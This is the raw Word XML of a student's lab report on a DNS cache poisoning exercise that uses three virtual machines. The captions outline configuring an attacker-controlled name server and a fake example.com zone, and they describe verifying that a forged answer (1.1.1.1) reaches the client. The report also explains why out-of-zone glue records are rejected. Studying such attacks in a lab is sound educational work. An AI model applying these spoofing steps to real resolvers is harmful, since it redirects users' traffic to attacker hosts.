    <w:p w14:paraId="09BD60F8" w14:textId="77777777" w:rsidR="00C06B3B" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="413DD16D" w14:textId="2362B908" w:rsidR="00C06B3B" w:rsidRDefault="00D93B49" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DE42B4F" wp14:editId="24DBE812">
            <wp:extent cx="5923280" cy="741680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="Picture 34" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.37.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3-23%20at%207.37.18%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3280" cy="741680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B981970" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA">
      <w:r>
        <w:t xml:space="preserve">screenshot2 on VM2. Add </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>db.attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to VM2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514CB89" w14:textId="77777777" w:rsidR="00C06B3B" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="59D10555" w14:textId="2EF2783D" w:rsidR="00C06B3B" w:rsidRDefault="00D93B49" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F269F4" wp14:editId="0B574B5A">
            <wp:extent cx="5923280" cy="3361055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Picture 35" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.37.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3-23%20at%207.37.58%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3280" cy="3361055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C6816B" w14:textId="77777777" w:rsidR="00C06B3B" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA">
      <w:r>
        <w:t xml:space="preserve">screenshot3 on VM1. Configure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>named.conf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.local on VM1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FC328" w14:textId="77777777" w:rsidR="00C06B3B" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="78CEB4D6" w14:textId="5A780F5C" w:rsidR="00C06B3B" w:rsidRDefault="00D93B49" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51AED06B" wp14:editId="592423A3">
            <wp:extent cx="5923280" cy="683895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="36" name="Picture 36" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.38.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3-23%20at%207.38.44%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3280" cy="683895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC77BF" w14:textId="77777777" w:rsidR="00C06B3B" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA">
      <w:r>
        <w:t>screenshot4 on VM1. Add example.com.db into VM1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8A938E" w14:textId="77777777" w:rsidR="00C06B3B" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="1B4B9F21" w14:textId="69EFAB3B" w:rsidR="00C06B3B" w:rsidRDefault="00D93B49" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CCECF5A" wp14:editId="0076D5AB">
            <wp:extent cx="5923280" cy="2915920"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="37" name="Picture 37" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.39.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3-23%20at%207.39.26%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3280" cy="2915920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63568E" w14:textId="2B4FAFDD" w:rsidR="0033531E" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA">
      <w:r>
        <w:t xml:space="preserve">screenshot5 on VM1. </w:t>
      </w:r>
      <w:r w:rsidR="00985566">
        <w:t>After all configuration, I r</w:t>
      </w:r>
      <w:r>
        <w:t>un “dig www.example.com” on VM3, the IP address of www.example.com becomes 1.1.1.1</w:t>
      </w:r>
      <w:r w:rsidR="003F3F51">
        <w:t>, our attack is successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC8B09" w14:textId="17DD9952" w:rsidR="0033531E" w:rsidRDefault="00D93B49" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3091C65E" wp14:editId="3BDFE83F">
            <wp:extent cx="5923280" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="38" name="Picture 38" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.40.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3-23%20at%207.40.48%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280" cy="3344545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA15E5" w14:textId="1E7B9F5C" w:rsidR="0033531E" w:rsidRDefault="00D93B49" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49718A00" wp14:editId="45DBDB5F">
            <wp:extent cx="5923280" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="Picture 39" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.41.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3-23%20at%207.41.22%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3280" cy="3352800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="551CE8F3" w14:textId="08DE6D67" w:rsidR="0033531E" w:rsidRDefault="00D93B49" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="007938D1" wp14:editId="2FC08C98">
            <wp:extent cx="5923280" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="Picture 40" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.42.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3-23%20at%207.42.04%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3280" cy="3352800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35B42D" w14:textId="7232A85E" w:rsidR="0033531E" w:rsidRDefault="0033531E" w:rsidP="006D3FFA">
      <w:r>
        <w:t>screenshot6. Wireshark captures the whole traffic.</w:t>
      </w:r>
      <w:r w:rsidR="001645F5">
        <w:t xml:space="preserve"> And the above screenshots also show what is inside in the DNS response packet sent from the local DNS server (VM2) to the client (VM3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B3811" w14:textId="77777777" w:rsidR="00C06B3B" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="32F2CEF3" w14:textId="260DA6F1" w:rsidR="00C06B3B" w:rsidRPr="00351A09" w:rsidRDefault="00C06B3B" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00351A09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation and Explanation</w:t>
      </w:r>
      <w:r w:rsidR="00351A09" w:rsidRPr="00351A09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA3D6D" w14:textId="61BEE81A" w:rsidR="00351A09" w:rsidRDefault="00351A09" w:rsidP="006D3FFA">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">This task is for result verification. </w:t>
      </w:r>
      <w:r w:rsidR="00044683">
        <w:t>Firstly, because I do not own a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005902FA">
        <w:t xml:space="preserve">real </w:t>
      </w:r>
      <w:r>
        <w:t>DNS domain name, I followed steps on the lab description to do demonstration by using fake domain name ns.dnslabattacker</w:t>
      </w:r>
      <w:r w:rsidR="0004138E">
        <w:t>.net. Screenshot1 to screenshot4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> describes the whole process</w:t>
      </w:r>
      <w:r w:rsidR="00044683">
        <w:t xml:space="preserve"> of configuration on VM2 and VM1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. After finishing all </w:t>
      </w:r>
      <w:r w:rsidR="0033531E">
        <w:t>these configurations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, I go back to VM3 (user machine) and run “dig </w:t>
      </w:r>
      <w:r w:rsidRPr="00351A09">
        <w:t>www.example.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”, the result is shown in the screeshot5. </w:t>
      </w:r>
      <w:r w:rsidR="0034164B">
        <w:t xml:space="preserve">We can see </w:t>
      </w:r>
      <w:r w:rsidR="00044683">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="0034164B">
        <w:t xml:space="preserve"> the answer section, the IP address of www.example.com is 1.1.1.1. This verifies that our attack is successful.</w:t>
      </w:r>
      <w:r w:rsidR="00572A9A">
        <w:t xml:space="preserve"> In the screenshot6, the </w:t>
      </w:r>
      <w:r w:rsidR="00FB2A22">
        <w:t>Wireshark captures the whole traffic. When we run “dig www.example.com” on VM3, it sends DNS query to VM2</w:t>
      </w:r>
      <w:r w:rsidR="00EA189E">
        <w:t xml:space="preserve"> (No.1)</w:t>
      </w:r>
      <w:r w:rsidR="00FB2A22">
        <w:t>. Because VM2 cached the name server of example.com, so it directly asks the name server-ns.dnslabattacker.net for answer. We have setup the fake domain name server on attacker machine VM1, so VM2 sends DNS query to VM1</w:t>
      </w:r>
      <w:r w:rsidR="00EA189E">
        <w:t xml:space="preserve"> (No.2)</w:t>
      </w:r>
      <w:r w:rsidR="00044683">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EA189E">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="00FB2A22">
        <w:t>fter VM2 receives the forged answer</w:t>
      </w:r>
      <w:r w:rsidR="00FE5C5F">
        <w:t xml:space="preserve"> which provided by the attacker machine</w:t>
      </w:r>
      <w:r w:rsidR="00EA189E">
        <w:t xml:space="preserve"> (No.3)</w:t>
      </w:r>
      <w:r w:rsidR="00FB2A22">
        <w:t>, it forward the forged answer to VM3</w:t>
      </w:r>
      <w:r w:rsidR="00EA189E">
        <w:t xml:space="preserve"> (No.4)</w:t>
      </w:r>
      <w:r w:rsidR="00FB2A22">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00044683">
        <w:t>Finally, VM3 prints the result as screenshot5 shows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD016C" w14:textId="7DEC5F8D" w:rsidR="00DA07F9" w:rsidRDefault="00DA07F9" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="53C24F11" w14:textId="5C8CA746" w:rsidR="00097416" w:rsidRDefault="00097416" w:rsidP="006D3FFA">
      <w:r>
        <w:t>Answer for Question in task2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AA3D3" w14:textId="222E3F85" w:rsidR="00DA07F9" w:rsidRDefault="00DA07F9" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>We cannot use the additional record to provide the IP address for</w:t>
      </w:r>
      <w:r w:rsidR="00892861">
        <w:t xml:space="preserve"> ns.dnslabattacker.net. When we provide ns.dnslabattacker.net as a name server in the authority section, that is fine because the name of domain’s authoritative name is not necessary to be a name inside the domain. However, in the additional section, even the record is related to the NS record in the authority section, it will not be accepted by the DNS server </w:t>
      </w:r>
      <w:r w:rsidR="00DF67A4">
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidR="00892861">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF67A4">
        <w:t>the name server is out of zone (</w:t>
      </w:r>
      <w:r w:rsidR="00892861">
        <w:t>ns.dnslabattacker.net is</w:t>
      </w:r>
      <w:r w:rsidR="00DF67A4">
        <w:t xml:space="preserve"> not in the zone of example.com).</w:t>
      </w:r>
      <w:r w:rsidR="00892861">
        <w:t xml:space="preserve"> Therefore, the IP address in the additional section will never be trusted and used</w:t>
      </w:r>
      <w:r w:rsidR="00DB4FA8">
        <w:t xml:space="preserve"> by the DNS server</w:t>
      </w:r>
      <w:r w:rsidR="00892861">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DA07F9"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FFA"/>
    <w:rsid w:val="00001217"/>
    <w:rsid w:val="00004CF6"/>
    <w:rsid w:val="0004138E"/>
    <w:rsid w:val="00044683"/>
    <w:rsid w:val="00097416"/>
    <w:rsid w:val="00097D29"/>
    <w:rsid w:val="000E40B3"/>
    <w:rsid w:val="000F14A8"/>
    <w:rsid w:val="001009B7"/>
    <w:rsid w:val="00101EA8"/>
    <w:rsid w:val="001645F5"/>
    <w:rsid w:val="00192A1C"/>
    <w:rsid w:val="001C4CBF"/>
    <w:rsid w:val="0020196F"/>
    <w:rsid w:val="00216FCE"/>
    <w:rsid w:val="002515BE"/>
    <w:rsid w:val="00276512"/>
    <w:rsid w:val="002770A3"/>
    <w:rsid w:val="0033531E"/>
    <w:rsid w:val="0034164B"/>
    <w:rsid w:val="00351A09"/>
    <w:rsid w:val="003520BB"/>
    <w:rsid w:val="003F3591"/>
    <w:rsid w:val="003F3F51"/>
    <w:rsid w:val="004065FE"/>
    <w:rsid w:val="00432939"/>
    <w:rsid w:val="00445F42"/>
    <w:rsid w:val="0046416A"/>
    <w:rsid w:val="00480A59"/>
    <w:rsid w:val="004B6611"/>
    <w:rsid w:val="00524E4C"/>
    <w:rsid w:val="00572A9A"/>
    <w:rsid w:val="005830B5"/>
    <w:rsid w:val="005902FA"/>
    <w:rsid w:val="005B34AE"/>
    <w:rsid w:val="005E2E93"/>
    <w:rsid w:val="005E77A5"/>
    <w:rsid w:val="006660F9"/>
    <w:rsid w:val="006B6C76"/>
    <w:rsid w:val="006C61F6"/>
    <w:rsid w:val="006D3FFA"/>
    <w:rsid w:val="00730629"/>
    <w:rsid w:val="00730A00"/>
    <w:rsid w:val="0077510C"/>
    <w:rsid w:val="007E0820"/>
    <w:rsid w:val="00803F3D"/>
    <w:rsid w:val="008220D0"/>
    <w:rsid w:val="00823967"/>
    <w:rsid w:val="00855997"/>
    <w:rsid w:val="008663AD"/>
    <w:rsid w:val="00876675"/>
    <w:rsid w:val="00892861"/>
    <w:rsid w:val="008E2497"/>
    <w:rsid w:val="00980D35"/>
    <w:rsid w:val="00985566"/>
    <w:rsid w:val="00995301"/>
    <w:rsid w:val="00A20D34"/>
    <w:rsid w:val="00A26AFB"/>
    <w:rsid w:val="00A33FE7"/>
    <w:rsid w:val="00AD449F"/>
    <w:rsid w:val="00B105B4"/>
    <w:rsid w:val="00B27677"/>
    <w:rsid w:val="00B67E1A"/>
    <w:rsid w:val="00BB4782"/>
    <w:rsid w:val="00C06B3B"/>
    <w:rsid w:val="00C55FC1"/>
    <w:rsid w:val="00C64D12"/>
    <w:rsid w:val="00D93B49"/>
    <w:rsid w:val="00DA07F9"/>
    <w:rsid w:val="00DB4FA8"/>
    <w:rsid w:val="00DD773C"/>
    <w:rsid w:val="00DF67A4"/>
    <w:rsid w:val="00EA189E"/>
    <w:rsid w:val="00F4009C"/>
    <w:rsid w:val="00F52B24"/>
    <w:rsid w:val="00FA4BE1"/>
    <w:rsid w:val="00FB2A22"/>
    <w:rsid w:val="00FE5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39FB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06B3B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B3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lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005B34AE"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B34AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B34AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B34AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B34AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit">
    <w:name w:val="lit"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B34AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00351A0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0159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24</Pages>
  <Words>3967</Words>
  <Characters>22612</Characters>
  <Application>Microsoft Macintosh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49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-14T19:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-24T03:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>